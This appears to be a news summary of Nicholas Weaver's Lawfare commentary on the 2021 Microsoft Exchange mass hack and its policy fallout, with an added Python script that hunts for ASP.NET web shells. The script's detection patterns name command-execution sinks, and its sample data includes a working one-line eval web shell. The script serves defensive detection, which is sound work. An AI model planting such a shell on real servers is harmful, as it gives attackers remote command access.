ARGUMENT: Hacking Exchange

The Microsoft Exchange Hack and the Great Email Robbery

Published 10 March 2021

The world is probably days away from the “Great Email Robbery,” in which a large number of threat actors around the globe are going to pillage and ransom the email servers of tens of thousands of businesses and local governments, Nicholas Weaver writes. Or at least pillage those that the purported Chinese actors haven’t already pillaged. “And now the Biden administration has a real hard policy problem: What now? The SolarWinds hack may have been significant, but [the Exchange attack] will affect far more institutions,” Weaver writes. “The Exchange attack showed complete disregard for possible consequences on behalf of those responsible for the breach,” but “without consequences, such broad attacks will simply continue.”

The world is probably days away from the “Great Email Robbery,” in which a large number of threat actors around the globe are going to pillage and ransom the email servers of tens of thousands of businesses and local governments, Nicholas Weaver writes in Lawfare. Or at least pillage those that the purported Chinese actors haven’t already pillaged.

On Mar. 5, the investigative journalist Brian Krebs reported that an “unusually aggressive Chinese cyber espionage unit” had gained access to more than 30,000 U.S. organizations. The New York Times detailed on Mar. 6 that “The number of victims is estimated to be in the tens of thousands and could rise.” How did the attackers breach the companies? The Chinese actors developed a way to compromise Microsoft Exchange servers and then used that foothold to attack the organizations running them. And many of those attacked remain exposed to follow-on attacks, not just by the Chinese actors but by numerous criminals. The impact of the Exchange hack will certainly be greater than that of SolarWinds, and researchers aren’t even close to the end of the story. But it’s a complicated story, with a lot to untangle.

Weaver summarizes the story, noting that the Chinese actors were not using a single vulnerability but a chain of four “zero-day” exploits. Somehow, the threat actor either knew that the exploits would soon become worthless or simply guessed that they would. So, in late February, the attacker changed strategy. Instead of exploiting only selected Exchange servers, the attackers stepped up their pace considerably, hitting tens of thousands of servers to install a web shell: not an exploit in itself, but a small script left behind on the compromised server that gives the attackers remote command access afterward, and that stays in place even once the original vulnerabilities are patched.
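Because a web shell survives patching, the practical question for anyone running a server hit by a wave like this is how to find the shell itself. The following is an added illustration, not code from Weaver, Lawfare, or any of the reporting above: a generic hunt over an IIS web root that flags ASP.NET script files which both read request input and hand it to an evaluator or process launcher, and optionally any script file modified after a chosen cutoff (a mass-exploitation wave drops its shells in a narrow time window). The indicator patterns, directory layout and the two sample files are constructed for the example and are assumptions, not indicators published for this incident.

```python
import os
import re
import tempfile
from datetime import datetime, timedelta, timezone

# Generic, constructed indicators of an ASP.NET web shell: the page takes
# attacker-supplied input from the request and passes it to something that
# evaluates or executes it. These are illustrative patterns, not published IOCs.
INPUT_SINKS = re.compile(
    r"Request\s*(\.Item|\.Form|\.QueryString|\[)|Request\.Params", re.I)
EXEC_SINKS = re.compile(
    r"\beval\s*\(|Process\.Start|System\.Diagnostics|cmd\.exe|"
    r"Assembly\.Load|CompileAssemblyFromSource", re.I)
SCRIPT_EXTS = {".aspx", ".ashx", ".asmx", ".asp"}


def find_webshell_candidates(root, newer_than=None):
    """Walk a web root and return sorted (path, reason) tuples for script files
    whose content looks like a shell (request input reaches an exec/eval sink).
    If newer_than (an aware datetime) is given, also flag every script file
    modified after it, regardless of content."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    body = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            reasons = []
            if INPUT_SINKS.search(body) and EXEC_SINKS.search(body):
                reasons.append("request input reaches an exec/eval sink")
            if newer_than is not None:
                mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                if mtime > newer_than:
                    reasons.append("modified after " + newer_than.isoformat())
            if reasons:
                hits.append((path, "; ".join(reasons)))
    return sorted(hits)


def build_sample_webroot():
    """Constructed sample data, not real files: one benign page and one
    one-line shell of the classic 'evaluate the cmd parameter' shape."""
    root = tempfile.mkdtemp(prefix="webroot-")
    benign = os.path.join(root, "owa", "default.aspx")
    os.makedirs(os.path.dirname(benign))
    with open(benign, "w") as fh:
        fh.write('<%@ Page Language="C#" %>\n<html><body>Welcome</body></html>\n')
    shell = os.path.join(root, "static", "help.aspx")
    os.makedirs(os.path.dirname(shell))
    with open(shell, "w") as fh:
        fh.write('<%@ Page Language="JScript"%>'
                 '<%eval(Request.Item["cmd"],"unsafe");%>\n')
    return root


def demo():
    """Build the constructed web root and run both checks.
    Returns (content_hits, recency_hits)."""
    root = build_sample_webroot()
    content_hits = find_webshell_candidates(root)
    cutoff = datetime.now(timezone.utc) - timedelta(hours=1)
    recency_hits = find_webshell_candidates(root, newer_than=cutoff)
    return content_hits, recency_hits


if __name__ == "__main__":
    content_hits, recency_hits = demo()
    print("content-based hits:")
    for path, reason in content_hits:
        print("  ", path, "->", reason)
    print("recency-based hits:")
    for path, reason in recency_hits:
        print("  ", path, "->", reason)
```

On the constructed sample the content check flags only help.aspx, while the recency check flags both files because both were just written; on a real server the modification-window heuristic is a triage aid that has to be paired with the content check or a known-good file inventory, since legitimate files change too.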

Weaver adds:

And now the Biden administration has a real hard policy problem: What now? The SolarWinds hack may have been significant, but this will affect far more institutions. The SolarWinds hackers stayed subtle. They targeted traditional intelligence targets and never transitioned to a “pillage everything” model, which made that attack more of a “Spies Gonna Spy” operation. The Exchange attack showed complete disregard for possible consequences on behalf of those responsible for the breach.

Without consequences, such broad attacks will simply continue. There are currently no reasons why an attacker who has access to a zero-day shouldn’t simply press a button and exploit every possible target at the moment when they know their exploit is about to lose value. I don’t know how to change this calculus, but the U.S. must do so somehow.